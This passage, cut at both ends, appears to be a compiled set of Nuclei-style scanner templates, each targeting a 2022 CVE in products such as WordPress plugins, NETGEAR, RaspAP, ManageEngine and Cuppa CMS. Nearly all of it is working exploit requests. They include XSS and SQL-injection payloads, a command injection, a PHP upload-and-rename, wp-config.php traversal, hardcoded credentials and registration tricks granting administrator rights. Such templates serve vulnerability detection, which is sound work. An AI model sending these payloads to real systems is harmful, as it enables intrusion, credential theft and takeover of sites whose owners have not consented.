/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","GOTMLS_mt"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29299","info":{"name":"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","/Solar_History.php\" METHOD=\"post\">"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29383","info":{"name":"NETGEAR ProSafe SSL VPN firmware - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n","POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"User authentication Failed\")","contains(body_2, \"User Login Failed for SSLVPN User.\")"],"condition":"and"}]}]},{"id":"CVE-2022-31299","info":{"name":"Haraj 3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script></textarea>","content=\"nextHaraj"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23178","info":{"name":"Crestron Device - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/aj.html?a=devi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uname\":","\"upassword\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2290","info":{"name":"Trilium <0.52.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No handler matched for custom <img src=x onerror=alert(document.domain)>","Note '<img src=x onerror=alert(document.domain)>' not found"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-23779","info":{"name":"Zoho ManageEngine - Internal Hostname Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/themes"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/themes/","text/html"],"condition":"and"},{"type":"word","part":"location","negative":true,"words":["{{Host}}"]},{"type":"word","words":["<center><h1>301 Moved Permanently</h1></center>"]},{"type":"regex","part":"location","regex":["https?:\\/\\/(.*):"]},{"type":"status","status":[301]}],"extractors":[{"type":"regex","group":1,"regex":["https?:\\/\\/(.*):"],"part":"location"}]}]},{"id":"CVE-2022-34045","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44949","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-34047","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /set_safety.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-47002","info":{"name":"Masa CMS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-25125","info":{"name":"MCMS 5.2.4  - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-30777","info":{"name":"Parallels H-Sphere 3.6.1713 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40879","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>=PQ</p>","\u8be5\u6587\u4ef6\u4e0d"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39986","info":{"name":"RaspAP 2.8.7 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncfg_id=;id;#\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32024","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26138","info":{"name":"Atlassian Questions For Confluence - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action\n"],"payloads":{"os_username":["disabledsystemuser"],"os_password":["disabled1system1user6708"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["location == \"/httpvoid.action\""]}]}]},{"id":"CVE-2022-30073","info":{"name":"WBCE CMS 1.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<p><b><script>alert(document.cookie)</script>","WBCECMS"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"formtoken","group":1,"regex":["<input\\stype=\"hidden\"\\sname=\"formtoken\"\\svalue=\"([^\"]*)\"\\s/>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-48197","info":{"name":"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1'\"()&%<zzz><script>alert(document.domain)</script>","widget.TreeView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1386","info":{"name":"WordPress Fusion Builder <3.6.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\naction=fusion_form_update_view\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"formData\"\n\nemail=example%40oast.me&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva\ncy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"action\"\n\nfusion_form_submit_form_to_url\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusion_form_nonce\"\n\n{{fusionformnonce}}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"form_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"post_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"field_labels\"\n\n{\"email\":\"Email address\"}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"hidden_field_names\"\n\n[]\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionAction\"\n\nhttps://oast.me\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionActionMethod\"\n\nGET\n-----------------------------30259827232283860776499538268--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Interactsh Server"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"fusionformnonce","internal":true,"xpath":["//*[@id=\"fusion-form-nonce-0\"]"],"attribute":"value","part":"body_1"}]}]},{"id":"CVE-2022-38296","info":{"name":"Cuppa CMS v1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /js/jquery_file_upload/server/php/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"path\"\n\n/\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"unique_name\"\n\ntrue\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_width\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_height\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"crop\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"compress\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"files[]\"; filename=\"test-{{randstr}}.jpg\"\nContent-Type: image/jpeg\n\n<?php\n\necho md5(\"CVE-2022-38296\");\n\n?>\n------WebKitFormBoundary9MZjlIG8fVPjrlCI--\n","POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//{{filename}}\",\"to\":\"//{{randstr}}.php\",\"action\":\"rename\"}\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["ed6bf8b1b4b8e64836455fe32b958c2c"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["\"name\":\"(.*?)\","],"internal":true}]}]},{"id":"CVE-2022-47966","info":{"name":"ManageEngine - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /SamlResponseServlet HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Unknown error occurred while processing your request"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-33119","info":{"name":"NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: \"><script>alert(document.domain)</script><\"\n\nlanguage=en&user=user&pass=pass&submit=Login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code == 200","contains(body,'<script>alert(document.domain)</script><\\\"?cmd=')"],"condition":"and"}]}]},{"id":"CVE-2022-1221","info":{"name":"WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script> popup-"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39952","info":{"name":"Fortinet FortiNAC - Arbitrary File Write","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/configWizard/keyUpload.jsp"],"body":"--{{boundaryId}}\nContent-Disposition: form-data; name=\"key\"; filename=\"{{to_lower(rand_text_alphanumeric(8))}}.zip\"\n\n{{randstr}}\n--{{boundaryId}}--\n","headers":{"Content-Type":"multipart/form-data; boundary={{boundaryId}}"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["zipUploadSuccess","SuccessfulUpload"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1392","info":{"name":"WordPress Videos sync PDF <=1.7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["failed to open stream: No such file or directory","REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28955","info":{"name":"D-Link DIR-816L - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/category_view.php","{{BaseURL}}/folder_view.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>SharePort Web Access</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0952","info":{"name":"WordPress Sitemap by click5 <1.0.36 - Missing Authorization","severity":"high"},"requests":[{"raw":["POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"1\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"default_role\":\"administrator\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"0\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","status_code == 200","contains(body_1, 'users_can_register')","contains(body_2, 'default_role')"],"condition":"and"}]}]},{"id":"CVE-2022-0441","info":{"name":"MasterStudy LMS <2.7.6 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"user_login\":\"{{username}}\",\"user_email\":\"{{user_email}}\",\"user_password\":\"{{password}}\",\"user_password_re\":\"{{password}}\",\"become_instructor\":\"\",\"privacy_policy\":true,\"degree\":\"\",\"expertize\":\"\",\"auditory\":\"\",\"additional\":[],\"additional_instructors\":[],\"profile_default_fields_for_register\":{\"wp_capabilities\":{\"value\":{\"administrator\":1}}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration completed successfully","\"status\":\"success\""],"condition":"and"},{"type":"word","part":"header_2","words":["application/json;"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"stm_lms_register\":\"([0-9a-z]+)\""],"internal":true},{"type":"kval","kval":["user_email","password"]}]}]},{"id":"CVE-2022-0660","info":{"name":"Microweber <1.2.11 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:comments\n\nclass=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,'QueryException')","contains(body_2,'SQLSTATE')","contains(body_2,'runQueryCallback')","contains(header_2,\"text/html\")","status_code_2==500"],"condition":"and"}]}]},{"id":"CVE-2022-0788","info":{"name":"WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": \"(SELECT 1 FROM (SELECT(SLEEP(6)))me)\", \"formid\": \"1\", \"type\": \"online_payment\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"Invalid payment.\")"],"condition":"and"}]}]},{"id":"CVE-2022-1119","info":{"name":"WordPress Simple File List <3.2.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3578","info":{"name":"WordPress ProfileGrid <5.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pm_add_group&id=\"><script>alert%28document.domain%29<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, \"Extension Options\")","contains(body_2, \"<script>alert(document.domain)</script>&tab\")"],"condition":"and"}]}]},{"id":"CVE-2022-28290","info":{"name":"WordPress Country Selector <1.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","country_selector_"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0535","info":{"name":"WordPress E2Pdf <1.16.45 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_nonce={{nonce}}&e2pdf_user_email=&e2pdf_api=api.e2pdf.com&e2pdf_connection_timeout=300&e2pdf_processor=0&e2pdf_dev_update=0&e2pdf_url_format=siteurl&e2pdf_mod_rewrite=0&e2pdf_mod_rewrite_url=e2pdf%2F%25uid%25%2F&e2pdf_cache=0&e2pdf_cache=1&e2pdf_cache_fonts=0&e2pdf_cache_fonts=1&e2pdf_debug=0&e2pdf_hide_warnings=0&e2pdf_images_remote_request=0&e2pdf_images_timeout=30&e2pdf_revisions_limit=3&e2pdf_memory_time=0&e2pdf_developer=0&e2pdf_developer_ips=%3C%2Ftextarea%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&submit=Save+Changes\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, 'placeholder=\\\"Developer IPs\\\" ></textarea><svg/onload=alert(document.domain)>')","contains(header_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_nonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-28079","info":{"name":"College Management System 1.0 - SQL 